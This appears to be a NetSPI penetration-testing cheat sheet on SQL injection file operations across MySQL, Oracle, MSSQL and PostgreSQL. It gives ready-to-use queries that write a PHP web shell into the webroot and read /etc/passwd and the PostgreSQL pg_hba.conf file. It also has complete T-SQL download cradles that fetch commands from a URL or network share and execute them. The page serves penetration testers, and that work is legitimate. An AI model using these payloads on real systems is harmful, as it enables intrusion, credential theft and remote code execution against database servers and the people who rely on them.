Reading and Writing Files
Reading and writing to files aids in data gathering as well as data exfiltration. Many methods include writing to the webroot, which enables a web shell to be executed, or allowing data to be exfiltrated over port 80/443.
* Requires privileged user
| Description | Query |
|---|---|
| Dump to file | SELECT * FROM mytable INTO dumpfile '/tmp/somefile' |
| Dump PHP Shell | SELECT 'system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php' |
| Read File | SELECT LOAD_FILE('/etc/passwd') |
| Read File Obfuscated | SELECT LOAD_FILE(0x633A5C626F6F742E696E69) reads c:\boot.ini |
| File Privileges | SELECT file_priv FROM mysql.user WHERE user = 'netspi' SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%netspi%' |
Reading and Writing Files
Reading and writing to files aids in data gathering as well as data exfiltration. Many methods include writing to the webroot, which enables a web shell to be executed, or allowing data to be exfiltrated over port 80/443.
UTL_FILE can sometimes be used. Check that the following is non-null:
SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
Java can be used to read and write files if it's installed (it is not available in Oracle Express).
Reading and Writing Files
Reading and writing to files aids in data gathering as well as data exfiltration. Many methods include writing to the webroot, which enables a web shell to be executed, or allowing data to be exfiltrated over port 80/443.
* Requires privileged user
| Description | Query |
|---|---|
| Download Cradle bulk in server - TSQL | -- Bulk Insert - Download Cradle Example -- Setup variables Declare @cmd varchar(8000) -- Create temp table CREATE TABLE #file (content nvarchar(4000)); -- Read file into temp table - web server must support propfind BULK INSERT #file FROM '\\sharepoint.acme.com@SSL\Path\to\file.txt'; -- Select contents of file SELECT @cmd = content FROM #file -- Display command SELECT @cmd -- Run command EXECUTE(@cmd) -- Drop the temp table DROP TABLE #file |
| Download Cradle OAP 1 - TSQL | -- OLE Automation Procedure - Download Cradle Example -- Does not require a table, but can't handle larger payloads -- Note: This also works with unc paths \\ip\file.txt -- Note: This also works with webdav paths \\ip@80\file.txt However, the target web server needs to support propfind. -- Setup Variables DECLARE @url varchar(300) DECLARE @WinHTTP int DECLARE @handle int DECLARE @Command varchar(8000) -- Set target url containting TSQL SET @url = 'http://127.0.0.1/mycmd.txt' -- Setup namespace EXEC @handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT -- Call the Open method to setup the HTTP request EXEC @handle=sp_OAMethod @WinHTTP, 'Open',NULL,'GET',@url,'false' -- Call the Send method to send the HTTP GET request EXEC @handle=sp_OAMethod @WinHTTP,'Send' -- Capture the HTTP response content EXEC @handle=sp_OAGetProperty @WinHTTP,'ResponseText', @Command out -- Destroy the object EXEC @handle=sp_OADestroy @WinHTTP -- Display command SELECT @Command -- Run command EXECUTE (@Command) |
| Download Cradle OAP 2 - TSQL | -- OLE Automation Procedure - Download Cradle Example - Option 2 -- Can handle larger payloads, but requires a table -- Note: This also works with unc paths \\ip\file.txt -- Note: This also works with webdav paths \\ip@80\file.txt However, the target web server needs to support propfind. -- Setup Variables DECLARE @url varchar(300) DECLARE @WinHTTP int DECLARE @Handle int DECLARE @Command varchar(8000) -- Set target url containting TSQL SET @url = 'http://127.0.0.1/mycmd.txt' -- Create temp table to store downloaded string CREATE TABLE #text(html text NULL) -- Setup namespace EXEC @Handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT -- Call open method to configure HTTP request EXEC @Handle=sp_OAMethod @WinHTTP, 'Open',NULL,'GET',@url,'false' -- Call Send method to send the HTTP request EXEC @Handle=sp_OAMethod @WinHTTP,'Send' -- Capture the HTTP response content INSERT #text(html) EXEC @Handle=sp_OAGetProperty @WinHTTP,'ResponseText' -- Destroy the object EXEC @Handle=sp_OADestroy @WinHTTP -- Display the commad SELECT @Command = html from #text SELECT @Command -- Run the command EXECUTE (@Command) -- Remove temp table DROP TABLE #text |
| Reading Files - TSQL | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceTxt.sql https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_BulkInsert.sql https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceXlsx https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetBulk.sql https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetTxt.sql https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetXlsx.sql |
| Writing Files - TSQL | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_bulkinsert.sql https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_OpenRowSetTxt.sql |
Reading and Writing Files
Reading and writing to files aids in data gathering as well as data exfiltration. Many methods include writing to the webroot, which enables a web shell to be executed, or allowing data to be exfiltrated over port 80/443.
* Requires privileged user
| Description | Query |
|---|---|
| Read Files from Operating System - COPY |
CREATE TABLE mydata(t text); COPY mydata FROM '/etc/passwd'; SELECT * FROM mydata; DROP TABLE mytest mytest; |
| Read Files from Operating System - pg_read_file | SELECT pg_read_file('/usr/local/pgsql/data/pg_hba.conf', 0, 200); |
| Writing Files from Operating System |
CREATE TABLE mytable (mycol text); INSERT INTO mytable(mycol) VALUES (''); COPY mytable (mycol) TO '/var/www/test.php'; |
© 2023 Copyright by NetSPI. All rights reserved.